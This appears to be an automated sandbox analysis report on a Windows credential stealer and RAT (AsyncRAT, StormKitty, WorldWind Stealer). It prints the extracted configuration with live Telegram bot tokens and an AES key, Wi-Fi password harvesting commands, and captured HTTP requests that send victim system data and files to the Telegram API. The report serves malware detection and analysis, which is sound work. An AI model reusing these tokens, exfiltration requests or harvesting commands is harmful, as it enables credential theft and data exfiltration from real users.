Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Client.exe

Overview

General Information

Sample name:Client.exe
Analysis ID:1501596
MD5:e29ab30e42348ecf2831928b7b95d5d8
SHA1:70ae302ae078326efbe444fd8158d2b104a06a69
SHA256:58b1013f511e61f2ddfb547939895ec161ab8bc03f5413529f85f1a3272d38d4
Tags:asyncratexeStormKittytelegram
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected WorldWind Stealer
AI detected suspicious sample
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious desktop.ini Action
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Client.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\Client.exe" MD5: E29AB30E42348ECF2831928B7B95D5D8)
    • cmd.exe (PID: 3728 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3804 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 3660 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 1916 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 2976 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 1592 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 3080 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"C2 url": "https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 81099, "from": {"id": 5344934242, "is_bot": true, "first_name": "Hey skid, add me on discord: _marvim_", "username": "HackinGusers_databot"}, "chat": {"id": 1619136628, "first_name": "GarY", "username": "Sunny_Hooda_11", "type": "private"}, "date": 1724994853, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}
{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628", "Version": "", "AES_key": "E2j9KwmxA0fsDzIAwy8PM7JVSe3hqJOh", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "ET/+RjH00EM3iiOkuY/sXxZ/NfmN/AkPHfg68HIoAeGI4xaZ94k+Qq70XSkWDG5K2LFni9yeGdizCO5tqPVN8QTFBECU/VsJJ0Vd0X6zkPtrzhzBBtyMmqu1fZHO1EpHHiBx9dr0w5+5CA/DQOxlrpxzynR8uZ7OEe55UIhpOWHR3G8hDB2+xsX8pEIqupxNmPiRZ7vmugb1oLCdQI3ZmI1/qrf2NaSSmFXV7p9PYY1/zff/escBR7FUlD1Qqs/2Gz5XuDm6sjvRKtm8Ecj3fxECe4xJGFkm5vEdRDVySBBalcHFFXJg1AAp40klEIuVZwh0gLOhUcEKrPQADFf9n5h53h7IE1RdBb9WrflWuqu/mCsPHAaQ6Rb+BecWQRB+D6CJ9ghbUmh3Z4SeFi8i0qheKZuhncHrh3aHXXDoZ/TUu/ruvFv9pUF8TnY7/P1j4da3AxF4Gl9SLxHe28zCI/6qfzL+u/qRkIMg4yjAYbVgJfHx9HY0LNPYgqwoYdbmnMld1Llh1lgfF6USwbHbyXNX7zC1CTnFX81oBQhnRRcFnNrfvbonjVzJ2c/oBqiNUcSznYCIjkNQVfoL0QPRoEz2O3pXLnxUExOrXapnoNORkBlyFkgGZ5L3JQaifzdVTBJJSqKnUiND0Y1fiw5ZEllAkBxzhhN63H99VkDQHBQ=", "Group": "Default"}
SourceRuleDescriptionAuthorStrings
Client.exeJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
    Client.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      Client.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        Client.exeJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
          Client.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            sslproxydump.pcapJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
                00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
                  00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                    00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                      00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        Click to see the 15 entries
                        SourceRuleDescriptionAuthorStrings
                        0.0.Client.exe.d00000.0.unpackJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
                          0.0.Client.exe.d00000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                            0.0.Client.exe.d00000.0.unpackJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                              0.0.Client.exe.d00000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                                0.0.Client.exe.d00000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                                  Click to see the 6 entries

                                  System Summary

                                  barindex
                                  Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\Client.exe, ProcessId: 6940, TargetFilename: C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Client.exe", ParentImage: C:\Users\user\Desktop\Client.exe, ParentProcessId: 6940, ParentProcessName: Client.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 3728, ProcessName: cmd.exe
                                  Timestamp:2024-08-30T07:14:12.277282+0200
                                  SID:2031009
                                  Severity:1
                                  Source Port:49714
                                  Destination Port:443
                                  Protocol:TCP
                                  Classtype:Malware Command and Control Activity Detected
                                  Timestamp:2024-08-30T07:14:12.277282+0200
                                  SID:2044766
                                  Severity:1
                                  Source Port:49714
                                  Destination Port:443
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:2024-08-30T07:14:13.361241+0200
                                  SID:2803305
                                  Severity:3
                                  Source Port:49715
                                  Destination Port:443
                                  Protocol:TCP
                                  Classtype:Unknown Traffic
                                  Timestamp:2024-08-30T07:14:17.099187+0200
                                  SID:2044557
                                  Severity:1
                                  Source Port:49721
                                  Destination Port:443
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: Client.exeAvira: detected
                                  Source: Client.exeMalware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628", "Version": "", "AES_key": "E2j9KwmxA0fsDzIAwy8PM7JVSe3hqJOh", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "ET/+RjH00EM3iiOkuY/sXxZ/NfmN/AkPHfg68HIoAeGI4xaZ94k+Qq70XSkWDG5K2LFni9yeGdizCO5tqPVN8QTFBECU/VsJJ0Vd0X6zkPtrzhzBBtyMmqu1fZHO1EpHHiBx9dr0w5+5CA/DQOxlrpxzynR8uZ7OEe55UIhpOWHR3G8hDB2+xsX8pEIqupxNmPiRZ7vmugb1oLCdQI3ZmI1/qrf2NaSSmFXV7p9PYY1/zff/escBR7FUlD1Qqs/2Gz5XuDm6sjvRKtm8Ecj3fxECe4xJGFkm5vEdRDVySBBalcHFFXJg1AAp40klEIuVZwh0gLOhUcEKrPQADFf9n5h53h7IE1RdBb9WrflWuqu/mCsPHAaQ6Rb+BecWQRB+D6CJ9ghbUmh3Z4SeFi8i0qheKZuhncHrh3aHXXDoZ/TUu/ruvFv9pUF8TnY7/P1j4da3AxF4Gl9SLxHe28zCI/6qfzL+u/qRkIMg4yjAYbVgJfHx9HY0LNPYgqwoYdbmnMld1Llh1lgfF6USwbHbyXNX7zC1CTnFX81oBQhnRRcFnNrfvbonjVzJ2c/oBqiNUcSznYCIjkNQVfoL0QPRoEz2O3pXLnxUExOrXapnoNORkBlyFkgGZ5L3JQaifzdVTBJJSqKnUiND0Y1fiw5ZEllAkBxzhhN63H99VkDQHBQ=", "Group": "Default"}
                                  Source: Client.exe.6940.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 81099, "from": {"id": 5344934242, "is_bot": true, "first_name": "Hey skid, add me on discord: _marvim_", "username": "HackinGusers_databot"}, "chat": {"id": 1619136628, "first_name": "GarY", "username": "Sunny_Hooda_11", "type": "private"}, "date": 1724994853, "text": "\ud83d\udcc1 Uploading Log Folders..."}}]}
                                  Source: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13Virustotal: Detection: 8%Perma Link
                                  Source: Client.exeReversingLabs: Detection: 81%
                                  Source: Client.exeVirustotal: Detection: 89%Perma Link
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                  Source: Client.exeJoe Sandbox ML: detected
                                  Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49712 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49714 version: TLS 1.2
                                  Source: Client.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
                                  Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
                                  Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
                                  Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

                                  Networking

                                  barindex
                                  Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.6:49714 -> 149.154.167.220:443
                                  Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.6:49714 -> 149.154.167.220:443
                                  Source: Network trafficSuricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.6:49721 -> 149.154.167.220:443
                                  Source: unknownDNS query: name: api.telegram.org
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: POST /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628 HTTP/1.1Content-Type: multipart/form-data; boundary="0339a720-379f-47b5-aa7e-aef79f6b64b8"Host: api.telegram.orgContent-Length: 187378Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1Content-Type: multipart/form-data; boundary="4918a032-b9c9-40e8-81a3-dfca8ed2bf78"Host: api.telegram.orgContent-Length: 187378Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                  Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
                                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: unknownDNS query: name: icanhazip.com
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 149.154.167.220:443
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                                  Source: global trafficDNS traffic detected: DNS query: 72.245.12.0.in-addr.arpa
                                  Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                                  Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                  Source: unknownHTTP traffic detected: POST /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619136628 HTTP/1.1Content-Type: multipart/form-data; boundary="0339a720-379f-47b5-aa7e-aef79f6b64b8"Host: api.telegram.orgContent-Length: 187378Expect: 100-continue
                                  Source: Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
